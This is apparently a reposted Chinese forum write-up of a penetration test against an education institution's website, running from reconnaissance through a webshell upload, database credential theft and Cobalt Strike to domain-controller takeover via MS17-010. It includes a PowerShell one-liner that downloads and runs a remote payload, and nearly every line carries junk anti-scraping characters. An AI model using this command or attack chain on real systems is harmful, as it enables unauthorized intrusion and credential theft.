|
$ K2 c! O) l* } 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路- t$ e5 _% B' K" m+ c
c4 N0 O, `2 ^3 `
+ V- P+ m# J) M+ G! V
, O6 {! `% q @/ T
0 I+ S8 ?& k) K& O3 ?! o& {' _
6 o$ a9 h1 X- E" ^6 F1 ?( W 正文( T# u3 B' U/ L; H2 |
9 ]& E6 d! B: b0 k5 x: W+ X: n: I7 @" a1 g' S
8 ?/ w1 V t7 z1 g4 }0 J. |
3 G# Q8 B% L+ u" q7 m0 p
1 s4 \7 }# N. [* G3 S) V& p% @4 v. K 目标:www.xxxx.com(一家教育机构)
; Z) x5 W! s- v O& x! @& s# A$ Y( O i
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能; X. n5 k& p4 f. x
+ Z! T5 n4 r5 L+ J& U2 `
5 G* s# I0 B8 s: x( X8 h
) N# D2 k. g! R+ x: F8 R3 s ) Y" P; f7 Y- s
$ X9 ], p: u6 ~( X. i0 u- V" A4 x$ O 进行了简单的信息搜集
: X- ^8 |9 h. _5 X
4 G. p0 ]2 ]1 r0 P) i* ^
6 n3 M# g' t$ m) V/ N% O- v 3 @6 b3 F8 m# _/ A6 w3 ~& z
8 f: v2 ?# W- S7 d- C 子域名搜集) C/ i3 ]) q- D+ [8 B; g
$ b/ T+ y, H) i8 a) Q8 ], y; t. c
$ X6 M- k& e) F
! w1 k, K/ A. _+ F5 o O8 x6 K' @( @; b) T- @: h
$ O- I) i1 I5 D/ C, H4 |9 Z
fofa找资产
?% `6 J' h) u$ k- B
1 L' D) L( r- D+ c3 U; l. G3 ]
( {4 }. k/ p% X2 w G+ J- u4 A T d# ~9 O
- ~) {: }' h9 d
, C) O0 v$ a/ O% |& z ? P! {: c, E! M. O0 b. D! D
: X. E, |! T" ^/ {
一共七个资产。去重之后只有两个。
# L; P2 C! O) l' z% B) t
! e7 i5 _% b4 ]
( `4 f5 S9 I. a0 S - p) i* X1 r3 k) z) S1 `2 k% g
- H# C# r2 M. {& ?* j R; q
目录探测
9 `& B0 C+ z$ ?- g; x$ ~ ) ]) s& C Z) Y/ Q* `! i( h
& b! U' A; u/ N3 L& \  1 R$ {9 `! W; U/ R5 x% _8 a
s/ g( q1 T/ ]& D; z
0 p" {7 a4 Q% s* D) I' f
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
+ n! Y4 Z/ C1 }: T
; V( Y" j) @- K- D
) K& \ C* x ?5 A, M M8 H+ C' z6 {5 o/ P- s
4 b3 a1 ~, `2 {, r, X% c
我又尝试了通过修改返回包来绕过登录界面% N. k/ P$ s7 T9 r8 u) ?9 ?1 _
0 z/ _/ \8 b9 ^7 Q j) G. ?9 J8 @5 o+ @
# i0 E Z1 F" ?" S+ A " d5 F& e. X% G* t% @) C) C
+ G# d5 @) C& ^7 o& X1 s
还是不行,尝试注入无果6 z9 ^! T( j0 e P v( `6 k# b* p
2 X6 Y" K8 Q$ R ]7 G
Y) e5 _" n" K6 G& Z
 4 a/ P' a8 t# k
2 ]% v1 T+ Q5 I: ^
- r. o/ ~0 }- a& C# A1 Z 不过我目录探测出了一处Spring信息泄露
[1 Z& e* @! u
1 e# L. y; u- \# _
! c* C: d4 T. M. x7 I5 q
5 l2 w/ `* a3 G; Y9 _4 S6 ?3 X
% v6 x9 n7 ]- D, M" y$ G( } 
3 `5 C! q# S4 W3 i& h& N ; S) E; C j' M
# g2 @5 M' m& E+ J 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
( q1 `$ i+ G$ J+ H, l l
5 `# X- s5 m$ H! P7 p8 [4 ~* { V5 W; C
6 A0 P& ]3 L& j' D+ c% h; z# z 2 g+ n8 g8 e: z1 q
4 q+ W5 _: U( I* S: b8 }% @. k4 [+ X) t 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
' f+ f1 _0 b2 l$ M! B! X# t+ C) i6 }
3 v5 g/ s0 I" |6 C7 E. L1 r4 x% ]1 `6 U9 F! ?; ` l/ S0 Q
 ; n G9 [4 I" Z8 [& g
* e7 ^* X0 M4 S( {9 U4 [
0 R' a4 w' y8 O. Y. L 获取有些师傅到这一步就手机抓包电脑测了。6 g+ c1 u* d2 s3 a7 x" }
) t" D( N2 I4 y2 k" H
0 _5 e) k( Y) Z G# v* W& ?8 t9 P
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
" y1 z3 _( } P' [; r/ n: g
/ z7 q% X g' h' v& ]# ?
# P& {2 A# b" f5 N 其中在一个公众号发现了小程序,可以进行注册。
9 ^7 Y) M3 Q4 C7 A5 K' x" l- ^ % k" I( Y' H4 G o
( ?8 A5 w( C+ T, ]8 r, O. S 看到了头像上传,尝试上传获取WebShell
8 C+ A8 G9 |$ |$ C7 Z
q- j. ~) R& `7 ?# o( [+ D! k6 ^8 {5 Y( q6 j5 t
/ T- L2 z7 ?) [, t# { 5 |8 y6 G/ F+ M5 K( o8 f8 W1 d/ `
/ [" s# l- Q( L X 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问" W1 g) S7 U1 Q. x" z8 W
. m0 U$ t9 O/ I( x4 J& U4 ?& X- ^1 }; A6 \$ i: [
 3 o# j+ i1 _5 d; C. w
7 m8 E- o4 A2 M) U+ p7 @+ ~
0 { H- D0 U/ Z/ p- l9 K5 \# H 然后上了大马
8 Z1 i" O( F- p: t, x. \( d2 }7 C
m: u& n* t. O' d' R _* `
^# B& G$ ~$ w6 |  # u7 @0 R& {' r& m0 ~3 r' i
$ y/ `" o. l. N; R2 f# Y5 H
; D/ u- h% [& Y
 6 z: p; g7 Q- d* O- h! O
8 H& h3 T/ t' G
3 C) p( j& Y+ V
通过翻找文件发现数据库账号密码$ {$ L r5 r5 f+ |. }1 p
6 _! X6 x" a& B& M! j
, ]4 O0 h$ B: {6 [& v8 { 
2 n$ |+ |; E: e9 }9 L0 a: m
3 i- {# `! X' s( N+ j; w' _5 {, O! O# M& o5 k0 j* {2 @
--内网渗透0 x/ A: o, \; ]
/ m- f x8 V+ S. O; q8 _0 C1 J# Z4 o9 x; \0 n* m8 ?" F
直接通过powershell执行 cs上线6 \% l- x) P/ |
& g% ^, Y. M3 R, V* C
" X9 X k1 c4 b- @4 u4 H powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
b6 S8 w% u. d) m# y4 P5 X) m
+ i V2 e1 |3 {$ ?% e
% d+ H) @( O' I i) ^  - g* W) [- a0 u7 I* @ _9 G2 h) ?- E
0 O) x3 A1 w# o+ u) j- A( Z
& @" M4 ?8 B+ N3 d, M" o
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破0 G9 O+ k$ ?: i- M( G* ]/ T
. v& a) c5 E. P, U0 e2 u4 P
+ n1 J1 L$ R4 t" C9 Q- S 
8 W, E& n, z( P* r4 v$ V8 ?
8 L: J0 z. t( ~8 G- f- ]# ?, l1 z& y5 G! J3 O* t
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
5 |# F- ~ |" k1 b i, N; I u2 k
; v; t! b4 C+ y2 w* ~
; [* c0 D- Q p8 } l4 B
" J0 b$ t# {- d, t6 E & N7 b7 d8 k6 ^# B. Y
# a8 k! K$ ]# |2 U% a; r& p 
; V; L+ _1 M* Y$ b4 b9 k5 `
7 F2 _4 C0 P: _$ X) r. H; M
7 J- w5 [5 F2 K3 n5 _ 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
) |9 z* o1 v! R; S9 l
& Z) \' C9 j( L" I( G1 U
\# S* C2 M8 G" ]7 |. @
- p! Z/ e J9 W* T
4 \' T U2 F( }5 J3 L, l5 p
 ; s R8 a: i- u) V1 E0 Z
9 n ?" i4 y5 ]; X5 `- ~$ l+ T8 v
7 F$ G p6 P( n' B3 h$ F
/ F# \2 j( B7 @6 G2 @: k
, p' W. {3 R$ h8 y( o9 j$ f% ] ` r8 l+ y5 d6 w- P3 l
. N3 d r. X0 J3 i+ T! u, B$ p; _6 E" A
Y* `. g) B* C( T) f7 [9 |9 B & C b9 s* {# w" a% a* e
% h: }; Q3 [2 f5 N3 E
小结$ T' j8 J6 }' O; d
0 a1 ~" ^9 A2 G( m' P% v. U
$ p; Z( I& \' U- M" t9 R1 Q9 v$ F& d
3 k0 ?" [% W3 d. ]" i8 e
3 x8 L" _5 x7 W; K, C
& {' O/ J1 U3 ^# O1 T 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
* y+ R: V5 S) x: k* t ! s' H5 H; K# v/ F$ N
- a: P0 l/ o8 k7 c* J# ]
`* Q, A$ _1 v# d; i 2 [- g/ N7 W' O5 V% j
+ \! C& O+ i% N! j - ; `/ M* r9 ~# V
* b2 X4 p ?, G
4 ]0 q* b1 U, I i. Z# F2 Z
-
6 B% i' H$ o8 x2 Q, g7 d ) U ^% n/ F$ U1 K$ V% s* L
, ?$ f6 _: g6 Q" r2 b! R
6 I; q; j' z, O! G6 N# U l- V4 e7 Y* z3 c2 ~% T
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html0 ~3 l/ V- {8 S" p
% \$ u: W; \, v. y' e0 V; K" c
1 X8 E' ?! j3 Q9 q3 @ - |, S+ o+ ?8 Y0 B" k, F& R1 G
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对